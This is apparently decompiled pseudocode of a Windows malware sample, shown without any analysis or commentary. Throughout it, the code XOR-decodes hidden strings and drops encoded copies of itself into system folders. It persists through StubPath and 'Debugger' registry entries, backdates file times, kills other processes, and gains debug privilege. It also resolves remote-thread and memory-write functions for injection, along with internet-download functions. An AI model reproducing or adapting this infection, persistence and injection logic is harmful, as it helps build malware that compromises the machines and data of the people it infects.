																												_t789 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t1292);
																												__eflags = _t789;
																												if(_t789 == 0) {
																													_t1190 =  &(_t1317[0xa0]);
																													RegSetValueExA(_t1317[0xac], 0x407177, 0, 4, _t1190, 4);
																													RegSetValueExA(_t1317[0xac], 0x407160, 0, 4, _t1190, 4);
																													RegSetValueExA(_t1317[0xac], 0x40714a, 0, 4, _t1190, 4);
																													RegSetValueExA(_t1317[0xac], 0x407135, 0, 4, _t1190, 4);
																													RegCloseKey(_t1317[0x98]);
																												}
																												_t790 = 0x4070c0;
																												while(1) {
																													__eflags = _t790 - 0x407134;
																													if(_t790 >= 0x407134) {
																														break;
																													}
																													 *_t790 =  *_t790 ^ 0x000000d4;
																													_t790 =  &(_t790[1]);
																												}
																												_t791 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t1292);
																												__eflags = _t791;
																												if(_t791 != 0) {
																													goto L643;
																												}
																												_t793 = E00401000(0x8000);
																												_t1317[0x74] = 0x4000;
																												_t1293 = _t793;
																												_t794 = 0x407080;
																												_t1317[0x9c] = 0x4000;
																												while(1) {
																													__eflags = _t794 - 0x4070a4;
																													if(_t794 >= 0x4070a4) {
																														break;
																													}
																													 *_t794 =  *_t794 ^ 0x000000d4;
																													_t794 =  &(_t794[1]);
																												}
																												_t1317[0x34] = 0;
																												while(1) {
																													_t386 =  &(_t1293[0x4000]); // 0x4000
																													_t1188 = _t386;
																													_t798 = RegEnumValueA(_t1317[0xb4], _t1317[0x4c], _t1293,  &(_t1317[0xac]), 0,  &(_t1317[0x78]), _t386,  &(_t1317[0x74]));
																													__eflags = _t798;
																													if(_t798 != 0) {
																														break;
																													}
																													__eflags = _t1317[0x70] - 1;
																													if(_t1317[0x70] == 1) {
																														_t800 = E00401311(_t1188, 0x40708d);
																														__eflags = _t800;
																														if(_t800 != 0) {
																															RegDeleteValueA(_t1317[0x9c], _t1293);
																														}
																													}
																													_t381 =  &(_t1317[0x34]);
																													 *_t381 =  &(_t1317[0x34][1]);
																													__eflags =  *_t381;
																													_t1317[0x74] = 0x4000;
																													_t1317[0x9c] = 0x4000;
																												}
																												_t1189 =  &(_t1317[0x1568]);
																												_t803 = wsprintfA(_t1293, 0x407080, _t1189) + 1;
																												__eflags = _t803;
																												_t1317 =  &(_t1317[0xc]);
																												RegSetValueExA(_t1317[0xac], _t1189, 0, 1, _t1293, _t803);
																												E00401029(_t1293);
																												RegCloseKey(_t1317[0x98]);
																												goto L643;
																											}
																											_t821 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &(_t1317[0x98]));
																											__eflags = _t821;
																											if(_t821 != 0) {
																												goto L603;
																											}
																											goto L600;
																										}
																										__eflags = _t666 - 0xffffffff;
																										if(_t666 == 0xffffffff) {
																											goto L592;
																										}
																										L591:
																										WriteFile(_t1240, 0x408840, 0x5e00,  &(_t1317[0xa0]), 0);
																										CloseHandle(_t1317[0xa0]);
																										goto L593;
																									}
																									__eflags = _t663 - 0xffffffff;
																									if(_t663 != 0xffffffff) {
																										goto L591;
																									}
																									goto L589;
																								}
																								__eflags = _t829 + 1;
																								if(_t829 + 1 != 0) {
																									L572:
																									WriteFile(_t1317[0xb0], 0x40e640, 0x1400,  &(_t1317[0xa0]), 0);
																									__eflags = _t1317[0xc];
																									if(_t1317[0xc] != 0) {
																										SetFileTime(_t1317[0xac],  &(_t1317[0x84]),  &(_t1317[0x88]),  &(_t1317[0x8c]));
																									}
																									CloseHandle(_t1317[0xa0]);
																									_t1317[0x24] = 1;
																									_push(0);
																									_push("winlogon.exe");
																									_t1192 =  &(_t1317[0xe20]);
																									_t835 = E0040318D(_t1192);
																									_t1317 =  &(_t1317[0xc]);
																									__eflags = _t835;
																									if(_t835 == 0) {
																										_push(0);
																										_push("explorer.exe");
																										E0040318D(_t1192);
																										_t1317 =  &(_t1317[0xc]);
																									}
																									_push(0);
																									_push("kernel32.dll");
																									_push(_t1192);
																									L586:
																									E0040318D();
																									_t1317 =  &(_t1317[0xc]);
																									CreateFileA( &(_t1317[0xe30]), 0x80000000, 1, 0, 3, 0, 0);
																									goto L587;
																								}
																								goto L584;
																							}
																							__eflags = _t655 + 1;
																							if(_t655 + 1 != 0) {
																								goto L572;
																							}
																							goto L581;
																						}
																						L578:
																						_t1317[0x24] = 1;
																						_push(0);
																						_push("kernel32.dll");
																						_push( &(_t1317[0xe20]));
																						goto L586;
																					}
																					__eflags = _t651 + 1;
																					if(_t651 + 1 == 0) {
																						goto L577;
																					}
																					goto L572;
																				}
																				_t1294 =  &(_t1317[0x5aa]);
																				_t843 = GetTempFileNameA(_t1173, "tmp", 0, _t1294);
																				__eflags = _t843;
																				if(_t843 == 0) {
																					goto L570;
																				}
																				_t844 = CreateFileA(_t1294, 0x40000000, 0, 0, 2, 0x80, 0);
																				_t1317[0xa0] = _t844;
																				__eflags = _t844;
																				if(_t844 == 0) {
																					goto L570;
																				}
																				__eflags = _t844 + 1;
																				if(_t844 + 1 == 0) {
																					goto L570;
																				}
																				L567:
																				WriteFile(_t1317[0xb0], _t1317[0x20], _t1313,  &(_t1317[0xa0]), 0);
																				CloseHandle(_t1317[0xa0]);
																				CreateFileA( &(_t1317[0x5c2]), 0x80000000, 1, 0, 3, 0, 0);
																				_t1295 =  &(_t1317[0x7b9]);
																				_t1264 =  &(_t1317[0x589]);
																				_t1225 =  &(_t1317[0x9e2]);
																				while(1) {
																					__eflags = _t1295 - _t1225;
																					if(_t1295 >= _t1225) {
																						goto L570;
																					}
																					_t852 = _t1317[0x7b8] & 0x000000ff ^  *_t1264;
																					_t1264 =  &(_t1264[0]);
																					 *_t1295 = _t852;
																					_t1295 =  &(_t1295[1]);
																				}
																				goto L570;
																			}
																			_t1296 =  &(_t1317[0x5aa]);
																			_push(_t1296);
																			_push(0);
																			_push(0x411040);
																			_push(_t1172);
																			L00405E90();
																			__eflags = _t645;
																			if(_t645 == 0) {
																				goto L562;
																			}
																			_push(0);
																			_push(0x80);
																			_push(2);
																			_push(0);
																			_push(0);
																			_push(0x40000000);
																			_push(_t1296);
																			L00405DB0();
																			_t1317[0xa0] = _t645;
																			__eflags = _t645;
																			if(_t645 == 0) {
																				goto L562;
																			}
																			__eflags = _t645 + 1;
																			if(_t645 + 1 != 0) {
																				goto L567;
																			}
																			goto L562;
																		}
																		RegDeleteValueA(_t638, "SubshellState");
																		RegCloseKey(_t1317[0x98]);
																		_t1297 =  &(_t1317[0x7b9]);
																		_t1265 =  &(_t1317[0x589]);
																		_t1226 =  &(_t1317[0x9e2]);
																		while(1) {
																			__eflags = _t1297 - _t1226;
																			if(_t1297 >= _t1226) {
																				break;
																			}
																			_t879 = _t1317[0x7b8] & 0x000000ff ^  *_t1297;
																			_t1297 =  &(_t1297[0]);
																			 *_t1265 = _t879;
																			_t1265 =  &(_t1265[1]);
																		}
																		_push( *0x4120b0);
																		_t858 =  &(_t1317[0x58e]);
																		_push(_t858);
																		L00405E50();
																		__eflags = _t858;
																		if(_t858 != 0) {
																			L537:
																			_t1193 =  &(_t1317[0x5ae]);
																			SetFileAttributesA(_t1193, 0x80);
																			DeleteFileA(_t1193);
																			goto L551;
																		}
																		_push( &(_t1317[0x1568]));
																		_t862 =  &(_t1317[0x6b2]);
																		_push(_t862);
																		L00405E50();
																		__eflags = _t862;
																		if(_t862 == 0) {
																			_t864 = CreateFileA( &(_t1317[0x5c2]), 0x80000000, 1, 0, 3, 0, 0);
																			_t1317[0xa0] = _t864;
																			__eflags = _t864;
																			if(_t864 == 0) {
																				goto L537;
																			}
																			__eflags = _t864 - 0xffffffff;
																			if(_t864 == 0xffffffff) {
																				goto L537;
																			}
																			_t865 = GetFileSize(_t864, 0);
																			_t1317[0x74] = _t865;
																			__eflags = _t865 - _t1313;
																			if(_t865 == _t1313) {
																				_t868 = E00401000(_t1313);
																				_t1298 = _t868;
																				ReadFile(_t1317[0xb0], _t868, _t1313,  &(_t1317[0xa0]), 0);
																				_t1194 = _t1317[0x74];
																				_t1266 = _t1298;
																				_t1280 = _t1317[0x14];
																				__eflags = _t1298 - _t1298 + _t1194;
																				while(__eflags < 0) {
																					_t1227 =  *_t1266 & 0x000000ff;
																					__eflags = _t1317[0x589] - ( *_t1280 & 0x000000ff);
																					if(__eflags == 0) {
																						__eflags = _t1227;
																					}
																					if(__eflags == 0) {
																						_t1266 =  &(_t1266[1]);
																						_t1280 =  &(_t1280[1]);
																						__eflags = _t1266 - _t1298 + _t1194;
																						continue;
																					}
																					E00401029(_t1298);
																					goto L541;
																				}
																				E00401029(_t1298);
																				goto L570;
																			}
																			L541:
																			CloseHandle(_t1317[0xa0]);
																		}
																		goto L537;
																	}
																	_t1195 =  &(_t1317[0xf2c]);
																	_t880 = GetSystemDirectoryA(_t1195, 0x104);
																	_push( *0x412090);
																	_push(0x41103e);
																	_push(_t1195);
																	L00405E30();
																	_push(_t880);
																	L00405E30();
																	_t881 = 0x407260;
																	while(1) {
																		__eflags = _t881 - 0x407286;
																		if(_t881 >= 0x407286) {
																			break;
																		}
																		 *_t881 =  *_t881 ^ 0x000000d4;
																		_t881 =  &(_t881[1]);
																	}
																	_t882 = CreateMutexA(0, 0, "h`r@");
																	_t1317[0xa0] = _t882;
																	__eflags = _t882;
																	if(_t882 == 0) {
																		Sleep(0x7d0);
																	} else {
																		WaitForSingleObject(_t882, 0x2710);
																		CloseHandle(_t1317[0xa0]);
																	}
																	_t1196 =  &(_t1317[0xf2c]);
																	SetFileAttributesA(_t1196, 0x80);
																	_t884 = CreateFileA(_t1196, 0x40000000, 0, 0, 2, 0x80, 0);
																	_t1317[0xa0] = _t884;
																	__eflags = _t884;
																	if(_t884 == 0) {
																		L530:
																		RegCloseKey(_t1317[0x98]);
																		RegDeleteKeyA(0x80000001,  &(_t1317[0x1038]));
																		goto L531;
																	}
																	__eflags = _t884 - 0xffffffff;
																	if(_t884 == 0xffffffff) {
																		goto L530;
																	}
																	WriteFile(_t884, 0x4072a0, 0x800,  &(_t1317[0xa0]), 0);
																	_t889 = E004010B2();
																	_t1317[0x1b] = _t889;
																	__eflags = _t889;
																	if(_t889 == 0) {
																		_t1317[0x1b] = 0xc6;
																	}
																	_t891 = E00401000(_t1313 + 0x64);
																	 *((char*)(_t891 + _t1313)) = 0;
																	_t1281 = _t891;
																	_t1299 = _t891;
																	_t1268 = _t1317[0x14];
																	_t892 = _t891 + _t1313;
																	while(1) {
																		__eflags = _t1299 - _t892;
																		if(_t1299 >= _t892) {
																			break;
																		}
																		_t917 = _t1317[0x1b] & 0x000000ff ^  *_t1268;
																		_t1268 =  &(_t1268[0]);
																		 *_t1299 = _t917;
																		_t1299 = _t1299 + 1;
																		_t892 = _t1281 + _t1313;
																	}
																	_t893 =  &(_t1317[0x1568]);
																	_t1197 = _t1281 + _t1313;
																	_push(_t893);
																	L00405E40();
																	_t1300 = _t1197 +  &(_t893[5]);
																	__eflags = _t1300 - _t1197 + 0x64;
																	while(__eflags < 0) {
																		 *_t1300 = E004010B2();
																		_t1300 = _t1300 + 1;
																		_t255 = _t1313 + 0x64; // 0x64
																		__eflags = _t1300 - _t1281 + _t255;
																	}
																	 *(_t1281 + _t1313 + 1) = _t1313;
																	_t1199 = _t1281 + _t1313;
																	_push( &(_t1317[0x1568]));
																	_t1301 = _t1199;
																	_push( &(_t1199[1]));
																	L00405E20();
																	_t896 =  &(_t1199[0x19]);
																	while(1) {
																		__eflags = _t1301 - _t896;
																		if(_t1301 >= _t896) {
																			break;
																		}
																		 *_t1301 =  *_t1301 ^ _t1317[0x1b] & 0x000000ff;
																		_t1301 =  &(_t1301[0]);
																		_t264 = _t1313 + 0x64; // 0x64
																		_t896 = _t1281 + _t264;
																	}
																	WriteFile(_t1317[0xb0], _t1281, _t1313 + 0x64,  &(_t1317[0xa0]), 0);
																	E00401029(_t1281);
																	__eflags = _t1317[0xc];
																	if(_t1317[0xc] != 0) {
																		SetFileTime(_t1317[0xac],  &(_t1317[0x84]),  &(_t1317[0x88]),  &(_t1317[0x8c]));
																	}
																	CloseHandle(_t1317[0xa0]);
																	_t1200 =  &(_t1317[0xf40]);
																	CreateFileA(_t1200, 0x80000000, 1, 0, 3, 0, 0);
																	E00401251(_t1317[0x98]);
																	_t1317[0x9c] = 1;
																	_t906 = RegSetValueExA(_t1317[0xac], "IsInstalled", 0, 4,  &(_t1317[0xa0]), 4);
																	_push(_t1200);
																	L00405E40();
																	_t907 = _t906 + 1;
																	__eflags = _t907;
																	RegSetValueExA(_t1317[0xac], "StubPath", 0, 1, _t1200, _t907);
																	_t1317[0x28] = 1;
																	goto L530;
																}
																__eflags =  *((char*)(_t1316 + 0x1e8));
																if( *((char*)(_t1316 + 0x1e8)) != 0) {
																	_push(_t1170);
																	_t920 = _t1316 + 0x1bc;
																	_push(_t920);
																	L00405E20();
																	while(1) {
																		_t1201 = _t1316 + 0x1b8;
																		_push(_t1201);
																		L00405E40();
																		__eflags = _t920 - 0xf;
																		if(_t920 > 0xf) {
																			goto L500;
																		}
																		_t920 = _t1316 + 0x1e8;
																		_push(_t920);
																		_push(_t1201);
																		L00405E30();
																	}
																	goto L500;
																}
																goto L496;
															}
															_t922 = RegCreateKeyA(0x80000002, 0x408720, _t1316 + 0x98);
															__eflags = _t922;
															if(_t922 != 0) {
																goto L494;
															}
															_t1202 = _t1316 + 0x123c;
															_t923 = GetSystemDirectoryA(_t1202, 0x104);
															_push( *0x4120a0);
															_push(0x41103e);
															_push(_t1202);
															L00405E30();
															_push(_t923);
															L00405E30();
															_t924 = 0x407ae0;
															while(1) {
																__eflags = _t924 - 0x407b06;
																if(_t924 >= 0x407b06) {
																	break;
																}
																 *_t924 =  *_t924 ^ 0x000000d4;
																_t924 =  &(_t924[1]);
															}
															_t925 = CreateMutexA(0, 0, 0x407ae0);
															 *(_t1316 + 0xa0) = _t925;
															__eflags = _t925;
															if(_t925 == 0) {
																Sleep(0x7d0);
															} else {
																WaitForSingleObject(_t925, 0x2710);
																CloseHandle( *(_t1316 + 0xa0));
															}
															_t1203 = _t1316 + 0x123c;
															SetFileAttributesA(_t1203, 0x80);
															_t927 = CreateFileA(_t1203, 0x40000000, 0, 0, 2, 0x80, 0);
															 *(_t1316 + 0xa0) = _t927;
															__eflags = _t927;
															if(_t927 == 0) {
																L493:
																RegCloseKey( *(_t1316 + 0x98));
																goto L494;
															}
															__eflags = _t927 - 0xffffffff;
															if(_t927 == 0xffffffff) {
																goto L493;
															}
															WriteFile(_t927, 0x407b20, 0xc00, _t1316 + 0xa0, 0);
															_t930 = E004010B2();
															 *(_t1316 + 0x1b) = _t930;
															__eflags = _t930;
															if(_t930 == 0) {
																 *(_t1316 + 0x1b) = 0x66;
															}
															_t932 = E00401000(_t1313 + 0x64);
															 *((char*)(_t932 + _t1313)) = 0;
															_t1282 = _t932;
															_t1302 = _t932;
															_t1271 =  *(_t1316 + 0x14);
															_t933 = _t932 + _t1313;
															while(1) {
																__eflags = _t1302 - _t933;
																if(_t1302 >= _t933) {
																	break;
																}
																_t957 =  *(_t1316 + 0x1b) & 0x000000ff ^  *_t1271;
																_t1271 =  &(_t1271[0]);
																 *_t1302 = _t957;
																_t1302 = _t1302 + 1;
																_t933 = _t1282 + _t1313;
															}
															_t934 = _t1316 + 0x1568;
															_t1204 = _t1282 + _t1313;
															_push(_t934);
															L00405E40();
															_t1303 = _t1204 + _t934 + 5;
															__eflags = _t1303 - _t1204 + 0x64;
															while(__eflags < 0) {
																 *_t1303 = E004010B2();
																_t1303 = _t1303 + 1;
																_t183 = _t1313 + 0x64; // 0x64
																__eflags = _t1303 - _t1282 + _t183;
															}
															 *(_t1282 + _t1313 + 1) = _t1313;
															_t1206 = _t1282 + _t1313;
															_push(_t1316 + 0x1568);
															_t1304 = _t1206;
															_push( &(_t1206[1]));
															L00405E20();
															_t937 =  &(_t1206[0x19]);
															while(1) {
																__eflags = _t1304 - _t937;
																if(_t1304 >= _t937) {
																	break;
																}
																 *_t1304 =  *_t1304 ^  *(_t1316 + 0x1b) & 0x000000ff;
																_t1304 =  &(_t1304[0]);
																_t192 = _t1313 + 0x64; // 0x64
																_t937 = _t1282 + _t192;
															}
															WriteFile( *(_t1316 + 0xb0), _t1282, _t1313 + 0x64, _t1316 + 0xa0, 0);
															E00401029(_t1282);
															__eflags =  *(_t1316 + 0xc);
															if( *(_t1316 + 0xc) != 0) {
																SetFileTime( *(_t1316 + 0xac), _t1316 + 0x84, _t1316 + 0x88, _t1316 + 0x8c);
															}
															CloseHandle( *(_t1316 + 0xa0));
															_t1207 = _t1316 + 0x1250;
															CreateFileA(_t1207, 0x80000000, 1, 0, 3, 0, 0);
															RegDeleteValueA( *(_t1316 + 0x9c), "Debugger");
															_t946 = E00401251( *(_t1316 + 0x98));
															_push(_t1207);
															L00405E40();
															_t947 = _t946 + 1;
															__eflags = _t947;
															RegSetValueExA( *(_t1316 + 0xac), "Debugger", 0, 1, _t1207, _t947);
															 *(_t1316 + 0x2c) = 1;
															goto L493;
														}
														__eflags = _t606 - 0xffffffff;
														if(_t606 == 0xffffffff) {
															goto L461;
														}
														_t1313 = GetFileSize(_t606, 0);
														 *(_t1316 + 0x14) = E00401000(_t960);
														ReadFile( *(_t1316 + 0xb0),  *(_t1316 + 0x20), _t1313, _t1316 + 0xa0, 0);
														CloseHandle( *(_t1316 + 0xa0));
														goto L462;
													}
													_t1208 = _t1316 + 0x145c;
													_t965 = GetSystemDirectoryA(_t1208, 0x100);
													_push( *0x4120b0);
													_push(0x41103e);
													_push(_t1208);
													L00405E30();
													L00405E30();
													_t1305 = _t1316 + 0x1568;
													_t967 = E004010F7(_t1316 + 0x1568, _t1208, _t965);
													__eflags = _t967;
													if(_t967 != 0) {
														L446:
														__eflags =  *(_t1316 + 0x20);
														if( *(_t1316 + 0x20) != 0) {
															_t980 = CreateFileA(_t1316 + 0x1470, 0x40000000, 0, 0, 3, 0, 0);
															__eflags = _t980;
															_t1211 = _t980;
															if(_t980 != 0) {
																__eflags = _t980 - 0xffffffff;
																if(_t980 != 0xffffffff) {
																	SetFilePointer(_t980, 0xfffffff0, 0, 2);
																	WriteFile(_t1211, 0x4120e0, 4, _t1316 + 0xa0, 0);
																	CloseHandle(_t1211);
																}
															}
														}
														__eflags =  *(_t1316 + 0xc);
														if( *(_t1316 + 0xc) != 0) {
															_t973 = CreateFileA(_t1316 + 0x1470, 0x80000100, 1, 0, 3, 0, 0); // executed
															__eflags = _t973;
															_t1210 = _t973;
															if(_t973 != 0) {
																__eflags = _t973 - 0xffffffff;
																if(_t973 != 0xffffffff) {
																	SetFileTime(_t1210, _t1316 + 0x84, _t1316 + 0x88, _t1316 + 0x8c); // executed
																	CloseHandle(_t1210);
																}
															}
														}
														_t1306 = _t1316 + 0x145c;
														SetFileAttributesA(_t1306, 0x21); // executed
														CloseHandle( *(_t1316 + 0x10));
														_t1209 = _t1316 + 0xb28;
														GetStartupInfoA(_t1209);
														CreateProcessA(_t1306, 0, 0, 0, 0, 0, 0, 0, _t1209, _t1316 + 0xb18);
														L455:
														L456:
														ExitProcess(0); // executed
														L457:
														 *0x412000 = 1;
														goto L458;
													}
													_push(0x104);
													_push(_t1208);
													_push( *0x4120b0);
													_push("%CommonProgramFiles%\\System\\");
													_t1283 = _t1316 + 0x1358;
													L00405E20();
													L00405E30();
													_t985 = ExpandEnvironmentStringsA(_t967, _t967, _t1283);
													__eflags = _t985;
													if(_t985 == 0) {
														L444:
														_push(0x104);
														_push(_t1208);
														_push( *0x4120b0);
														_push("%AppData%\\");
														L00405E20();
														L00405E30();
														_t986 = ExpandEnvironmentStringsA(_t985, _t985, _t1283);
														__eflags = _t986;
														if(_t986 == 0) {
															goto L457;
														}
														_t988 = E004010F7(_t1305, _t1208);
														__eflags = _t988;
														if(_t988 == 0) {
															goto L457;
														}
														goto L446;
													}
													_t985 = E004010F7(_t1305, _t1208);
													__eflags = _t985;
													if(_t985 != 0) {
														goto L446;
													}
													goto L444;
												}
												L435:
												CloseHandle( *(_t1316 + 0x10)); // executed
												goto L436;
											}
											__eflags =  *(_t1316 + 0x34) - 0x11;
											if( *(_t1316 + 0x34) > 0x11) {
												__eflags =  *(_t1316 + 0x1c);
												if( *(_t1316 + 0x1c) != 0) {
													goto L456;
												}
												E0040265F(0);
												goto L435;
											}
											_t997 = CreateToolhelp32Snapshot(2, 0);
											__eflags = _t997;
											_t1315 = _t997;
											if(_t997 == 0) {
												L424:
												__eflags =  *(_t1316 + 0x34) - 0xb;
												if( *(_t1316 + 0x34) > 0xb) {
													goto L435;
												}
												_t999 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0x20019, _t1316 + 0x98);
												__eflags = _t999;
												if(_t999 != 0) {
													goto L435;
												}
												 *(_t1316 + 0x30) = 0;
												_t1001 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778, _t1316 + 0x98, 0);
												__eflags = _t1001;
												if(_t1001 != 0) {
													L431:
													RegCloseKey( *(_t1316 + 0x98));
													goto L435;
												}
												 *(_t1316 + 0x9c) = 0x12;
												_t1004 = RegQueryValueExA( *(_t1316 + 0xac), "Default Flags", 0, 0, 0x412190, _t1316 + 0x9c);
												__eflags = _t1004;
												if(_t1004 == 0) {
													_t1007 = RegSetValueExA( *(_t1316 + 0xa8), "Default Flags", 0, 3, 0x412190, 0x12);
													__eflags = _t1007;
													_t118 = _t1007 == 0;
													__eflags = _t118;
													 *(_t1316 + 0x30) = (_t1007 & 0xffffff00 | _t118) & 0x000000ff;
												}
												RegCloseKey( *(_t1316 + 0x94));
												__eflags =  *(_t1316 + 0x30);
												if( *(_t1316 + 0x30) == 0) {
													RegDeleteKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy");
												}
												goto L431;
											}
											_t1011 = E004030DE(_t1316 + 0x1f8);
											 *(_t1316 + 4) = _t1011;
											__eflags = _t1011;
											if(_t1011 == 0) {
												L403:
												_t1012 = GetCurrentProcessId();
												 *(_t1316 + 0x428) = 0x128;
												_t1212 = _t1012;
												_t1284 = 0;
												__eflags = 0;
												_t1014 = Process32First(_t1315, _t1316 + 0x428);
												while(1) {
													__eflags = _t1014;
													if(_t1014 == 0) {
														break;
													}
													__eflags =  *(_t1316 + 0x430) - _t1212;
													if( *(_t1316 + 0x430) == _t1212) {
														L410:
														_t1014 = Process32Next(_t1315, _t1316 + 0x428);
														continue;
													}
													_push( *0x4120b0);
													_t1024 = E004010DC(_t1316 + 0x450);
													_push(_t1024);
													_t1308 = _t1024;
													L00405E50();
													__eflags = _t1024;
													if(_t1024 == 0) {
														L408:
														_t1025 = OpenProcess(0x100201, 0,  *(_t1316 + 0x430));
														 *(_t1316 + 0x558 + _t1284 * 4) = _t1025;
														__eflags = _t1025;
														if(_t1025 == 0) {
															goto L410;
														}
														_t1284 = _t1284 + 1;
														__eflags = _t1284 - 9;
														if(_t1284 > 9) {
															break;
														}
														goto L410;
													}
													_push("winrnt.exe");
													_push(_t1308);
													L00405E50();
													__eflags = _t1024;
													if(_t1024 != 0) {
														goto L410;
													}
													goto L408;
												}
												_t1213 = 0;
												__eflags = 0;
												CloseHandle(_t1315);
												while(1) {
													__eflags = _t1213 - _t1284;
													if(_t1213 >= _t1284) {
														break;
													}
													_t1213 = _t1213 + 1;
													SetPriorityClass( *(_t1316 + 0x55c + _t1213 * 4), 0x40);
												}
												_t1307 = 4;
												do {
													_t1214 = 0;
													__eflags = 0;
													while(1) {
														__eflags = _t1214 - _t1284;
														if(_t1214 >= _t1284) {
															goto L418;
														}
														_t1214 = _t1214 + 1;
														TerminateProcess( *(_t1316 + 0x55c + _t1214 * 4), 0);
													}
													L418:
													_t1307 = _t1307 - 1;
													__eflags = _t1307;
												} while (_t1307 >= 0);
												_t1215 = 0;
												__eflags = 0;
												while(1) {
													__eflags = _t1215 - _t1284;
													if(_t1215 >= _t1284) {
														break;
													}
													WaitForSingleObject( *(_t1316 + 0x55c + _t1215 * 4), 0x1388);
													_t1215 = _t1215 + 1;
													CloseHandle( *(_t1316 + 0x558 + _t1215 * 4));
												}
												__eflags =  *(_t1316 + 4);
												if( *(_t1316 + 4) != 0) {
													_t1216 = _t1316 + 0x21e;
													SetFileAttributesA(_t1216, 0x80);
													DeleteFileA(_t1216);
												}
												goto L424;
											}
											RegDeleteValueA(_t1011, "SubshellState");
											RegCloseKey( *(_t1316 + 4));
											_t1309 = _t1316 + 0x21a;
											_t1277 = _t1316 + 0x31e;
											while(1) {
												__eflags = _t1309 - _t1277;
												if(_t1309 >= _t1277) {
													goto L403;
												}
												 *_t1309 =  *_t1309 ^  *(_t1316 + 0x1f8) & 0x000000ff;
												_t1309 =  &(_t1309[0]);
											}
											goto L403;
											L436:
											 *(_t1316 + 0x34) =  *(_t1316 + 0x34) + 1;
										}
									}
									_t1093 = "InternetOpenA";
									while(1) {
										__eflags = _t1093 - 0x4105fd;
										if(_t1093 >= 0x4105fd) {
											break;
										}
										 *_t1093 =  *_t1093 ^ 0x000000d4;
										_t1093 =  &(_t1093[1]);
									}
									_t1094 = "InternetOpenUrlA";
									while(1) {
										__eflags = _t1094 - 0x4105ef;
										if(_t1094 >= 0x4105ef) {
											break;
										}
										 *_t1094 =  *_t1094 ^ 0x000000d4;
										_t1094 =  &(_t1094[1]);
									}
									_t1095 = "InternetReadFile";
									while(1) {
										__eflags = _t1095 - 0x4105de;
										if(_t1095 >= 0x4105de) {
											break;
										}
										 *_t1095 =  *_t1095 ^ 0x000000d4;
										_t1095 =  &(_t1095[1]);
									}
									_t1096 = "InternetSetOptionA";
									while(1) {
										__eflags = _t1096 - 0x4105cd;
										if(_t1096 >= 0x4105cd) {
											break;
										}
										 *_t1096 =  *_t1096 ^ 0x000000d4;
										_t1096 =  &(_t1096[1]);
									}
									_t1097 = "InternetCloseHandle";
									while(1) {
										__eflags = _t1097 - 0x4105ba;
										if(_t1097 >= 0x4105ba) {
											break;
										}
										 *_t1097 =  *_t1097 ^ 0x000000d4;
										_t1097 =  &(_t1097[1]);
									}
									 *0x4121d0 = GetProcAddress(_t1168, "InternetOpenA");
									 *0x4121e0 = GetProcAddress(_t1168, "InternetOpenUrlA");
									 *0x4121f0 = GetProcAddress(_t1168, "InternetReadFile");
									 *0x412200 = GetProcAddress(_t1168, "InternetSetOptionA");
									 *0x412210 = GetProcAddress(_t1168, "InternetCloseHandle");
									goto L136;
								}
								_t1108 = "GetIpAddrTable";
								while(1) {
									__eflags = _t1108 - 0x4106f4;
									if(_t1108 >= 0x4106f4) {
										break;
									}
									 *_t1108 =  *_t1108 ^ 0x000000d4;
									_t1108 =  &(_t1108[1]);
								}
								 *0x4121c0 = GetProcAddress(_t1167, "GetIpAddrTable");
								goto L95;
							}
							_t1110 = "RasEnumConnectionsA";
							while(1) {
								__eflags = _t1110 - 0x410715;
								if(_t1110 >= 0x410715) {
									break;
								}
								 *_t1110 =  *_t1110 ^ 0x000000d4;
								_t1110 =  &(_t1110[1]);
							}
							 *0x4121b0 = GetProcAddress(_t1166, "RasEnumConnectionsA");
							goto L86;
						}
						_t1113 = "CreateRemoteThread";
						while(1) {
							__eflags = _t1113 - 0x4107ce;
							if(_t1113 >= 0x4107ce) {
								break;
							}
							 *_t1113 =  *_t1113 ^ 0x000000d4;
							_t1113 =  &(_t1113[1]);
						}
						 *0x412260 = GetProcAddress(_t1162, "CreateRemoteThread");
						_t1115 = "ntdll.dll";
						while(1) {
							__eflags = _t1115 - 0x4107bb;
							if(_t1115 >= 0x4107bb) {
								break;
							}
							 *_t1115 =  *_t1115 ^ 0x000000d4;
							_t1115 =  &(_t1115[1]);
						}
						_t1116 = "NtAllocateVirtualMemory";
						while(1) {
							__eflags = _t1116 - 0x4107b1;
							if(_t1116 >= 0x4107b1) {
								break;
							}
							 *_t1116 =  *_t1116 ^ 0x000000d4;
							_t1116 =  &(_t1116[1]);
						}
						_t1117 = "NtWriteVirtualMemory";
						while(1) {
							__eflags = _t1117 - 0x410799;
							if(_t1117 >= 0x410799) {
								break;
							}
							 *_t1117 =  *_t1117 ^ 0x000000d4;
							_t1117 =  &(_t1117[1]);
						}
						_t1118 = "NtShutdownSystem";
						while(1) {
							__eflags = _t1118 - 0x410784;
							if(_t1118 >= 0x410784) {
								break;
							}
							 *_t1118 =  *_t1118 ^ 0x000000d4;
							_t1118 =  &(_t1118[1]);
						}
						_t1119 = "RtlAdjustPrivilege";
						while(1) {
							__eflags = _t1119 - 0x410773;
							if(_t1119 >= 0x410773) {
								break;
							}
							 *_t1119 =  *_t1119 ^ 0x000000d4;
							_t1119 =  &(_t1119[1]);
						}
						_t1120 = LoadLibraryA("ntdll.dll");
						_t1217 = _t1120;
						 *0x412220 = GetProcAddress(_t1120, "NtAllocateVirtualMemory");
						 *0x412230 = GetProcAddress(_t1217, "NtWriteVirtualMemory");
						 *0x412240 = GetProcAddress(_t1217, "NtShutdownSystem");
						_t1124 = GetProcAddress(_t1217, "RtlAdjustPrivilege");
						 *0x412250 = _t1124;
						__eflags = _t1124;
						_t1232 = _t1124;
						if(_t1124 != 0) {
							RtlAdjustPrivilege(0x14, 1, 0, _t1316 + 0xa7); // executed
						}
						_t1125 = "NtOpenProcessToken";
						while(1) {
							__eflags = _t1125 - 0x410760;
							if(_t1125 >= 0x410760) {
								break;
							}
							 *_t1125 =  *_t1125 ^ 0x000000d4;
							_t1125 =  &(_t1125[1]);
						}
						_t1126 = "NtQueryInformationToken";
						while(1) {
							__eflags = _t1126 - 0x41074d;
							if(_t1126 >= 0x41074d) {
								break;
							}
